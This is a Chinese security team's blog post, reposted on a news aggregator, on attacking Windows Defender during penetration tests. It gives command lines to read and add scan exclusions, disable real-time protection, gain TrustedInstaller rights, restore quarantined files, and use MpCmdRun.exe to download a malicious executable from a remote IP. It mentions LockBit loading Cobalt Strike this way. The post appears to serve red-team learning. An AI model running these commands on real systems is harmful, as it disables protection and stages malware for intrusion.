Redian新闻
>
Windows Defender的一些渗透知识

Windows Defender的一些渗透知识

科技


前言

Microsoft Defender,最初称为Microsoft AntiSpyware,是微软推出的一款杀毒软件。相信大家对Windows Defender 的防御性能还是没有怀疑的,毕竟最了解Windows系统的还得是微软自己。但是这货也比较令人头疼,毕竟它检测到问题直接就杀了,然后弹窗告诉用户“我已经拦截了一个XXX”。完全属于先斩后奏。今天正好看到大佬的文章,跟着学习一下Windows defender相关的知识。

测试环境版本

系统:Windows server 2016 Windows defender版本:版本信息:反恶意软件容户端版本:4.10.14393.1794 引擎版本:1.1.19500.2 防病毒定义:1.373.1325.0 反间谍软件定义:1.373.1325.0 网络检查系统引擎版本:2.1.14600 4 网络检查系统定义版本:119.0.00 测试权限:administrator

查看Windows defender版本

面板查看

设置-更新和安全-Windows Defender

命令行查看

注:新版本Windows Defender已不适用

dir "C:\ProgramData\Microsoft\Windows Defender\Platform\" /od /ad /b

查看已存在的查杀排除列表

  • • 通过面板查看依次选择设置-更新和安全-Windows Defender-添加排除项如下图

  • • 通过命令行查看reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s

  • • 通过Powershell查看Get-MpPreference | select ExclusionPath

关闭Windows Defender的实时保护

1.通过面板关闭依次选择

设置-更新和安全-Windows Defender-实时保护

通过命令行关闭defender 实时保护

  • • 需要TrustedInstaller权限

  • • 需要关闭Tamper Protectionreg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f

注:通过命令行开启defender 实时保护

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /f

注:新版本的Windows已经不再适用

添加查杀排除列表

通过面板添加

依次选择 设置-更新和安全-Windows Defender-排除-添加排除项-选择排除的进程或文件类型&文件夹

  • • 该操作等价于修改注册表HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\的键值,具体位置如下:

    类型文件对应注册表项TemporaryPaths 类型文件夹对应注册表项Paths 类型文件类型对应注册表项Extensions 类型进程对应注册表项Processes

通过命令行添加

利用条件:需要TrustedInstaller权限

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "c:\tide" /d 0 /t REG_DWORD /f

恢复被隔离的文件

参考资料:https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/command-line-arguments-microsoft-defender-antivirus?view=o365-worldwide

MpCmdRun.exe存在的位置

  • • 简介 mpcmdrun.exe 是 Microsoft Windows 安全系统的重要组成部分,可帮助保护您的 PC 免受在线威胁和恶意软件的侵害。如果您想自动化 Microsoft 安全防病毒,也可以使用此实用程序。.exe 必须从 Windows 命令提示符运行。在实验过三个不同的Windows版本后,发现微软在新版本已经更改了MpCmdRun的位置(具体哪个版本后更改的不清楚,在这两个路径下查找就对了) 更改后的位置在C:\Program Files\Windows Defender\MpCmdRun.exe老版本dir "C:\ProgramData\Microsoft\Windows Defender\Platform\" /od /ad /b得到版本号后,则他存在的位置为C:\ProgramData\Microsoft\Windows Defender\Platform\<版本>比如我这台存在的物理位置为

C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\X86

常用命令

  • • 查看被隔离的文件列表MpCmdRun -Restore -ListAll

  • • 恢复指定名称的文件至原目录MpCmdRun -Restore -FilePath C:\tide\7.exe

  • • 恢复所有文件至原目录MpCmdRun -Restore -All

  • • 查看指定路径是否位于排除列表中MpCmdRun -CheckExclusion -path C:\test

    补充1:获取TrustedInstaller权限

    AdvancedRun

    AdvancedRun是运行于Windows系统的轻量级程序设置优先级软件,可以轻松设置程序运行优选级,并且还能够支持通过命令行调用设置,也支持将参数保存为配置文件,以便于更好进行使用。在图形化界面

或者使用命令行

AdvancedRun.exe /EXEFilename "%windir%\system32\cmd.exe" /CommandLine '/c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /d 1 /t REG_DWORD /f' /RunAs 8 /Run

补充2:MpCmdRun.exe利用

MpCmdRun恶意文件下载

Windows Defender自带的命令执行工具"MpCmdRun.exe"可以用来实现远程下载恶意文件的目的,但是免杀好像还是不太可靠,不过我们可以在cmd中关闭Windows Defender,所以这样一来,一结合就变得有意思多了,不管在使用该思路的过程中还需要权限提升,但是CS因为在后渗透测试中有很好的辅助功能,所以总体来说还是划算的~ PS:经过实验发现在新版本中下载任何文件Windows defender都会报毒并隔离(下图),若尝试关闭实时保护则mpcmdrun不可用。。。不过老版本defender还是可以的。在目标主机上使用Windows Defender自带的MpCmdRun.exe程序下载恶意文件

MpCmdRun.exe -DownloadFile -url http://*.*.*.*:81/co.exe -path c:\co.exe

MpCmdRun.exe解密和加载Cobalt Strike攻击载荷

这篇文章是7月底发布的,还算比较新(在我10月份写这篇文章的时候)。https://www.bleepingcomputer.com/news/security/lockbit-ransomware-abuses-windows-defender-to-load-cobalt-strike/ 一开始还以为是生成含有恶意载荷的dll文件替为MPClient.dll后就可以执行,结果在自己机器上尝试了一下根本不能上线,仔细看了看(谷歌翻译后)才明白大意是攻击者通过MpCmdRun.exe 加载修改后的MPClient.dll执行c0000015.log进而实现上线Cobalt Strike,当然这就触及到我的知识盲区了,感兴趣的铁子可以继续研究一下(教教我)。

参考文章

https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Windows-Defender

往期推荐

敏感信息泄露

潮影在线免杀平台上线了

自动化渗透测试工具开发实践

【红蓝对抗】利用CS进行内网横向

一个Go版(更强大)的TideFinger

SRC资产导航监测平台Tsrc上线了

新潮信息-Tide安全团队2022年度总结

记一次实战攻防(打点-Edr-内网-横向-Vcenter)

E

N

D


知识星球产品及服务

团队内部平台:潮汐在线指纹识别平台 | 潮听漏洞情报平台 | 潮巡资产管理与威胁监测平台 | 潮汐网络空间资产测绘 | 潮声漏洞检测平台 | 在线免杀平台 | CTF练习平台 | 物联网固件检测平台 | SRC资产监控平台  | ......


星球分享方向:Web安全 | 红蓝对抗 | 移动安全 | 应急响应 | 工控安全 | 物联网安全 | 密码学 | 人工智能 | ctf 等方面的沟通及分享


星球知识wiki:红蓝对抗 | 漏洞武器库 | 远控免杀 | 移动安全 | 物联网安全 | 代码审计 | CTF | 工控安全 | 应急响应 | 人工智能 | 密码学 | CobaltStrike | 安全测试用例 | ......


星球网盘资料:安全法律法规 | 安全认证资料 | 代码审计 | 渗透安全工具 | 工控安全工具 | 移动安全工具 | 物联网安全 | 其它安全文库合辑  | ......

扫码加入一起学习吧~

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
‘No Way Out’: Why China’s Mortgage Strikers Refuse to Back Down简化版的肠镜检查微软将系统功能与explorer.exe解耦,加速Windows新出炉的美国小姐,太美了,美绝人寰!2022庭院:佛手瓜Defender for Endpoint 新特性,IT管理员可远程锁定 Linux 设备AmEx refer 买菜+5x活动:成功refer一个朋友3个月内买菜可额外5倍返点8点1氪:宣布降价后,特斯拉中国三天内获3万辆订单;辉瑞称正与中国的合作伙伴携手;Windows7将彻底退出历史舞台AmEx Gold refer 上限升高成100k了!【附:信用卡 Refer a Friend 福利介绍】【波士顿精品门户社区】【本科友好】【South End/Chinatown/Downtown】【$3195】【现房+9/1排位】Chase Sapphire Preferred (CSP) 信用卡【90k Offer 将于3月19日开始!】OFFER榜出炉 | 秋招的尾声也是收获OFFER的时候!USC Downtown免免免免租|这个数?在 LA Downtown住进心愿单里的家6年技术工程师转行Tesla资深PM!大学生揽下微软与ServiceNow双PM实习Offer|11月产品经理Offer榜恭喜UCL学员拿下Jefferies (UK)实习Offer超过macOS 5000多倍!Windows仍是恶意软件主要攻击对象【信息安全三分钟】2022.01.03恭喜DBC职梦IC学员拿下Jefferies (UK) IT暑期实习Offer!Kubernetes 1.26 版本正式发布:改进 Windows 支持,加强网络安全和管理功能举国之力完成与 Windows, Linux 并驾齐驱的 中国操作系统 是否可行?昨天的三餐,顺便聊聊睡眠【租房推荐】Chinatown近Downtown高级公寓楼推荐从Linux on arm到Windows on arm天赋“易昺(bǐng)”,创造历史!TrendForce:OEM 为笔记本升级至 1TB+ SSD 动力不足,或与微软 Windows 授权价格有关【现房+排位】【市区顶级公寓】【Emerson/Suffolk/Chinatown/Downtown】【室内洗烘】【接受本科生】悉大不看均分,只要申请就发offer!3分钟带你看懂两大offer的区别;内附官方一对一答疑见面会在美国295.老人中心是我的家2022傅雷翻译出版奖获奖者揭晓 Le palmarès du Prix Fu Lei 2022 dévoiléEverythingToolbar 1.0发布,支持Windows 11最争议的一代 Windows:Vista 16岁了!被海王校EA/ED Defer了,2023年写Love Letter还能转正拿Offer吗?超过macOS 5000多倍!Windows成恶意软件主要攻击对象ICRA 2023 | CurveFormer:基于Transformer的3D车道线检测新网络WPP收购北美数字机构Fēnom Digital;凯捷旗下The Works公司公布新任命(广告狂人日报)硬核观察 #849 Windows 7 和 8 的支持在明年 1 月彻底结束
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。